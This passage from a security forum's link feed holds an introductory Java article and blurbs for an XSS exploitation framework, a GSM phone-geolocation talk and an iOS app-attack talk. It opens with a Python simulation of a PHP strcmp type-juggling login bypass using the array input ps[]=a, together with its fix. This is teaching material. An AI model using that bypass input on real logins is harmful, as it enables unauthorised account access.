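    if not isinstance(a, str) or not isinstance(b, str):
        return None
    return (a > b) - (a < b)

def php_loose_equals_zero(value):
    # Under PHP loose comparison (==), NULL == 0 is true.
    return value is None or value == 0

# Sending ps[]=a makes $_POST['ps'] an array, not a string:
check = php_strcmp("the_real_otp_hash", ["a"])
print(php_loose_equals_zero(check))  # True -> the "login" check passes
```

The simulation makes the fix obvious as well: a strict comparison (PHP's ===, or an explicit type check before comparing) would reject the NULL and close the hole.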
  22. Demystifying Java Internals (An introduction)

Volume 1

Java is a technology that makes it easy to develop distributed applications, which are programs that can be executed by multiple computers across a network, whether it is a local or a wide area network. Java has expanded the Internet's role from an arena for communications to a network on which full-fledged applications can be executed. Ultimately, this open-source technology enables network programming across diverse platforms. This article illustrates the following underlying contents in detail:

- Genesis of Java
- Java and the World Wide Web
- Beauty of Java: The "Bytecode"
- Java Framework Configuration
- Java Features
- Summary

Before Java, the Internet was used primarily for sharing information, though developers soon realized that the World Wide Web could meet some business needs. The WWW is a technology that treats Internet resources as linked, and it has revolutionized the way people access information. The web has enabled Internet users to access Internet services without learning sophisticated cryptic commands. Through the web, corporations can easily provide product information and even sell merchandise. Java technology takes this a step further by making it possible to offer fully interactive applications via the web. In particular, Java programs can be embedded into web documents, turning static pages into applications that run on the user's computer. Java has the potential to change the function of the Internet, much as the web has changed the way people access the Internet. In other words, not only will the network provide information, it will also serve as an operating system.

Genesis of Java

In 1990, Java was conceived by James Gosling, Patrick Naughton, and Ed Frank at Sun Microsystems. This language was initially known as Oak.
Oak preserved the familiar syntax of C++ but omitted its potentially dangerous features, such as pointer arithmetic, operator overloading, and explicit resource references. Oak incorporated memory management directly into the language, freeing the programmer to concentrate on the task to be performed by the program. As Oak matured, the WWW was growing dramatically, and the team at Sun realized that Oak was perfectly suited to Internet programming. Thus, in 1994, they completed work on a product known as WebRunner, an early browser written in Oak. WebRunner was later renamed HotJava, and it demonstrated the power of Oak as an Internet development tool. Finally, in 1995, Oak was renamed Java and introduced at Sun. Since then, Java's rise in popularity has been dramatic.

Java is related to C++, which is a direct descendant of C, and much of the character of Java is inherited from those two languages. From C, Java derives its syntax, and many of Java's OOP features were influenced by C++. Java is a truly object-oriented, case-sensitive programming language.

The original impetus for Java was not the Internet. Instead, the primary motivation was the need for a platform-independent language that could be used to create software to be embedded in various consumer electronic devices. The trouble with C and C++ is that they are designed to be compiled for a specific target, so an easier and more cost-efficient solution was Java technology, a truly open-source technology.

Java and the World Wide Web

Today, the web acts as a convenient transport mechanism for Java programs, and the web's ubiquity has popularized Java as an Internet development tool. Java expands the universe of objects that can move about freely in cyberspace. In a network, two very broad categories of objects are transmitted between a server and your personal computer: passive information and dynamic, active programs. For example, when you read your e-mail, you are viewing passive data.
However, a second type of object can be transmitted to your computer: a dynamic, self-executing program. For example, a program might be provided by the server to properly display the data that the server is sending. A dynamic network program presents serious problems in the areas of security and portability. As you will see, Java addresses those concerns effectively by introducing a new form of program: the applet.

Java primarily stipulates two types of programs: applets and applications. An applet is an application designed to be transmitted over the Internet and executed by a Java-compatible web browser. It is a tiny Java program that can be dynamically downloaded across the network, and it can react to user input and change dynamically. On the other hand, an application runs on your computer under that computer's operating system, like an application created in the C or C++ language.

Java technology provides portable code execution across diverse platforms. Many types of computers and operating systems are in use throughout the world, and many are connected to the Internet. For programs to be dynamically downloaded to all the various types of platforms connected to the Internet, some means of generating portable executable code is needed.

Beauty of Java: The "Byte-code"

The Java compiler does not produce native executable code, which helps resolve the security and portability issues. Rather, it produces Bytecode: a highly optimized set of instructions designed to be executed by the Java run-time system, known as the Java Virtual Machine (JVM). The JVM is essentially an interpreter for Bytecode. Translating a Java program into Bytecode makes it much easier to run the program on a wide variety of platforms such as Linux, Windows, and Mac. The only requirement is that the JVM be implemented for each platform. Once the run-time package exists for a given system, any Java program can execute on it.
Although the details of the JVM differ from platform to platform, all interpret the same Java Bytecode. Thus, the interpretation of Bytecode is a feasible solution to creating a truly portable program. In fact, most compiled languages, such as C++, are designed to be compiled rather than interpreted, mostly because of concern about performance: when a program is interpreted, it generally runs substantially slower than it would if compiled to executable code. However, the use of Bytecode enables the Java run-time system to execute programs much faster than you might expect.

To execute Java Bytecode, the JVM uses a class loader to fetch the Bytecodes from a network or disk. Each class file is fed to a Bytecode verifier that ensures the class is formatted correctly and will not corrupt memory when it is executed. The JIT compiler converts the Bytecodes to native code instructions on the user's machine immediately before execution. The JIT compiler runs on the user's machine and is transparent to the user; the resulting native code instructions do not need to be ported, because they are already at their destination. The following figure illustrates how the JIT compiler works.

Prerequisite

In order to write and execute a program written in the Java language, we need to configure our workstation with the following software:

- Java Development Kit (JDK)
- Java Virtual Machine (JVM)
- Eclipse Juno IDE
- Tomcat Web Server (required for Servlets and JSP)
- Notepad++ (optional)

Java Framework Configurations

A Java program can be built and compiled either with third-party tools, such as Eclipse Juno, or with the Java Development Kit tools; the JDK tools require some configuration on the user's machine in order to run programs, while a third-party IDE typically handles this for you. In keeping with the open-source nature of Java, such development tools are freely available from the Oracle Technology Network website.
The following segments specify the configuration of each particular tool in detail.

Java Development Kit

The JDK, originally called the Java Development Environment, can create and display graphical applications. The JDK consists of a library of standard classes (the core Java API) and a collection of utilities for building, testing, and documenting Java programs. You need the core Java API to access the core functionality of the Java language. The core Java API includes the underlying language constructs, as well as graphics, networking, garbage collection, and file input/output capabilities. The JDK utilities are outlined here:

[TABLE]
[TR]
[TD]JDK Utility[/TD]
[TD]Description[/TD]
[/TR]
[TR]
[TD]javac[/TD]
[TD]The Java compiler; converts source code into Bytecode.[/TD]
[/TR]
[TR]
[TD]java[/TD]
[TD]The Java interpreter; executes Java application Bytecodes.[/TD]
[/TR]
[TR]
[TD]javah[/TD]
[TD]Generates a C header file that can be used to make a C routine that calls a Java method.[/TD]
[/TR]
[TR]
[TD]javap[/TD]
[TD]Used to disassemble Java class files; displays accessible data and functions.[/TD]
[/TR]
[TR]
[TD]appletviewer[/TD]
[TD]Used to execute Java applet classes.[/TD]
[/TR]
[TR]
[TD]jdb[/TD]
[TD]The Java debugger; allows stepping through the program.[/TD]
[/TR]
[TR]
[TD]javadoc[/TD]
[TD]Creates HTML documentation based on source code.[/TD]
[/TR]
[TR]
[TD]keytool[/TD]
[TD]Used for security key generation and management.[/TD]
[/TR]
[TR]
[TD]rmic[/TD]
[TD]Creates classes that support remote method invocation (RMI).[/TD]
[/TR]
[TR]
[TD]rmiregistry[/TD]
[TD]Used to gain access to RMI objects; starts the remote object registry.[/TD]
[/TR]
[TR]
[TD]rmid[/TD]
[TD]Used for RMI object registration; starts the activation system daemon.[/TD]
[/TR]
[TR]
[TD]serialver[/TD]
[TD]This serialization utility permits versioning of persisted objects.[/TD]
[/TR]
[TR]
[TD]jar[/TD]
[TD]Allows multiple Java classes and resources to be distributed in one compressed file.[/TD]
[/TR]
[TR]
[TD]jarsigner[/TD]
[TD]Implements digital signing for JAR and class files.[/TD]
[/TR]
[TR]
[TD]native2ascii[/TD]
[TD]Converts Unicode characters to international encoding schemes.[/TD]
[/TR]
[/TABLE]

After installing and configuring the JDK, you will see the way these tools are applied to build and run a Java application, as illustrated in the following figure:

First Hello World Java Program

Java source code can be written with a simple text editor such as Notepad; a full IDE such as Eclipse Juno additionally provides numerous development templates. The following console-based Java program simply prints "Hello world" text on the screen. The code defines a Java class called HelloWorld, which contains a single method called main(). When the Java interpreter tries to execute the HelloWorld class, it will look for a method called main(), and the VM will execute this function to run the program.

```java
/* HelloWorld.java sample */
public class HelloWorld {
    public static void main(String[] args) {
        System.out.println("Hello World!");
    }
}
```

Save the file under the name "HelloWorld.java" somewhere on disk.
Remember, the file name must match the class name and carry the *.java extension. To compile the sample program, execute the compiler, javac, specifying the name of the source file at the command prompt. The javac compiler creates a file called HelloWorld.class that contains the Bytecode version of the program. To actually run the program, you must use the Java interpreter, called java. To do so, pass the class name as a command-line argument. The following figure depicts the whole life cycle of the Java compilation process: We can gather from this sample that a Java program is first compiled and then interpreted. The following illustrates how the various tools are employed during the compilation process. By adding a few comments to your Java source code, you make it possible for javadoc to automatically generate HTML documentation for your code. After adding the comments, run the javadoc command and it will generate a set of HTML files: It is possible to examine the Bytecodes of a compiled class file and identify its accessible variables and functions. The javap utility creates a report that shows not only what functions and variables are available, but also what the code actually does, although at a very low level, as in the following: Java Features In this section, we will look briefly at the major characteristics that make Java such a powerful development tool, including cross-platform execution support, multi-threading, security, and object orientation: Architecture-Neutral One of the main problems facing programmers is that there is no guarantee that if you write a program today, it will run tomorrow, even on the same machine. Processor and operating system upgrades, and changes in core system resources, can make a program malfunction. Java resolves all these issues by introducing “write once, run anywhere” functionality. Object-Oriented Java is an object-oriented language: that is, it has object-oriented programming (OOP) facilities built into the language. 
With OOP support, we can write reusable, extensible, and maintainable software. Java supports all the object-oriented mechanisms: abstraction, inheritance, polymorphism, and encapsulation. Interpreted and High Performance Java enables the creation of cross-platform programs by compiling them into an intermediate representation called Bytecode. This code can be interpreted on any system that provides a JVM. Java was also designed to perform well on very low-power CPUs, and Java Bytecode can be translated directly into native machine code for very high performance by using a just-in-time (JIT) compiler. Multi-Threading Support Java was designed to meet the real-world requirement of creating interactive networked programs. To accomplish this, Java supports multithreaded programming, which allows you to write programs that do many things simultaneously. The Java run-time system comes with an elegant yet sophisticated solution for multi-process synchronization that enables you to construct smoothly running interactive systems. Distributed Applications Java is designed for the distributed environment of the Internet, because it handles TCP/IP protocols. This allows objects on two different computers to execute procedures remotely. Java exposes these remote interfaces in a package called RMI (Remote Method Invocation). This feature brings an unparalleled level of abstraction to client/server programming. Strictly Typed Language Java promotes robust programming by restricting a few key areas, forcing you to find your mistakes early, at design time. Java frees you from having to worry about many of the most common causes of programming errors. Because Java is a strictly typed language, it checks your code at compile time; however, it also checks your code at run time. Security Security is probably the main problem facing Internet developers. Users are typically afraid of two things: confidential information being compromised and their computer systems being corrupted or destroyed by hackers. 
Java’s built-in security addresses both of these concerns. The Java security model has three primary components: the class loader, the Bytecode verifier, and the SecurityManager class. We will dig deeper into these concepts in later articles. Final Note This article introduced you to the history of Java, its effect on the WWW, and the underlying Java architecture. It explained the role of the Java Development Kit in writing program code. We have seen how to write a simple Java console application using JDK utilities such as java, javac, and javadoc. Finally, we came to an understanding of why Java is so popular among the developer community by outlining its advantages over other languages. After reading this article, one can easily start programming in Java. By Ajay Yadav|October 22nd, 2013 Sursa: Demystifying Java Internals (An introduction) - InfoSec Institute
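The javadoc comment style described above can be sketched in a few lines. This is a hypothetical example (the Greeter class and its contents are illustrative, not from the article); running javadoc on such a file turns the /** ... */ comments into HTML documentation:

```java
/**
 * A minimal example of javadoc-style comments.
 * Running "javadoc Greeter.java" would turn these
 * comments into HTML documentation pages.
 */
public class Greeter {

    /**
     * Builds a greeting for the given name.
     *
     * @param name the person to greet
     * @return the greeting text
     */
    public static String greet(String name) {
        return "Hello, " + name + "!";
    }

    public static void main(String[] args) {
        System.out.println(greet("World"));  // prints Hello, World!
    }
}
```

Note that javadoc only picks up comments that start with /** and are placed directly before a class, field, or method declaration.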
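The multithreading support discussed above can also be shown with a minimal sketch (class and method names here are our own, not from the article): two threads update a shared counter, and the synchronized keyword provides the thread synchronization the article refers to.

```java
// Minimal multithreading sketch: two threads increment a shared
// counter; synchronized makes each update atomic.
public class CounterDemo {
    private int count = 0;

    public synchronized void increment() {
        count++;
    }

    public synchronized int get() {
        return count;
    }

    public static void main(String[] args) throws InterruptedException {
        CounterDemo counter = new CounterDemo();
        Runnable task = () -> {
            for (int i = 0; i < 10_000; i++) {
                counter.increment();
            }
        };
        Thread t1 = new Thread(task);
        Thread t2 = new Thread(task);
        t1.start();
        t2.start();
        t1.join();  // wait for both workers to finish
        t2.join();
        System.out.println("Final count: " + counter.get());  // prints 20000
    }
}
```

Without the synchronized keyword the two threads could interleave their read-modify-write steps and lose updates, which is exactly the kind of error the Java run-time's synchronization primitives are designed to prevent.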
  23. Owasp Xenotix Xss Exploit Framework V4.5 Video Documentation Description: OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world's second-largest collection of XSS payloads, with 1500+ distinctive payloads for effective XSS vulnerability detection and WAF bypass. It incorporates a feature-rich information-gathering module for target reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Version 4.5 Download: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework#tab=Downloads Official Website: OWASP Xenotix XSS Exploit Framework v4.5 Relesed ‹ OpenSecurity Sursa: Owasp Xenotix Xss Exploit Framework V4.5 Video Documentation
  24. Brucon 0x05 - David Perez, Jose Pico - Geolocation Of Gsm Mobile Devices Description: Geolocation of mobile devices (MS) by the network has always been considered of interest, for example, to locate people in distress calling an emergency number, and so the GSM standard provides different location services (LCS), some network-based, and some MS-based or MS-assisted. OK, but what if a third party, without access to the network, was interested in knowing the exact position of a particular MS? Could he or she locate it? In this presentation we will show that this is indeed possible, even if the MS does not want to be found, meaning that the device has all its location services deactivated. We will demonstrate a system we designed and built for this purpose, which can be operated from any standard vehicle and can pinpoint the exact location of any target MS in a radius of approximately 2 kilometers around the vehicle. Yet, the main focus of the presentation will not so much be the system itself as the process we followed for its design and implementation. We will describe in detail the many technical difficulties that we encountered along the way and how we tackled them. We believe this can be useful for people embarking on similar research projects. Obviously, a system like this cannot be demonstrated live in the room (it would be quite illegal), but we will show videos of the different consoles of the system, operating in different environments. For More Information please visit : - BruCON 2013 Sursa: Brucon 0x05 - David Perez, Jose Pico - Geolocation Of Gsm Mobile Devices
  25. Louisville Infosec 2013 - Attacking Ios Applications - Karl Fosaaen Description: This presentation will cover the basics of attacking iOS applications (and their back ends) using a web proxy to intercept, modify, and repeat HTTP/HTTPS requests. From setting up the proxy to pulling data from the backend systems, this talk will be a great primer for anyone interested in testing iOS applications at the HTTP protocol level. There will be a short (2 minute) primer on setting up the intercepting proxy, followed by three practical examples showing how to intercept data headed to the phone, how to modify data heading to the application server, and how to pull extra data from application servers to further an attack. All of these examples will focus on native iOS apps (Game Center and Passbook) and/or functionality (Passbook Passes). Karl is a senior security consultant at NetSPI. This role has allowed Karl to work in a variety of industries, including financial services, health care, and hardware manufacturing. Karl specializes in network and web application penetration testing. In his spare time, Karl helps out as an OPER at THOTCON and a swag goon at DEF CON. For More Information please visit : - Louisville Metro InfoSec - Theme: Mobile Security Louisville Infosec 2013 Videos Sursa: Louisville Infosec 2013 - Attacking Ios Applications - Karl Fosaaen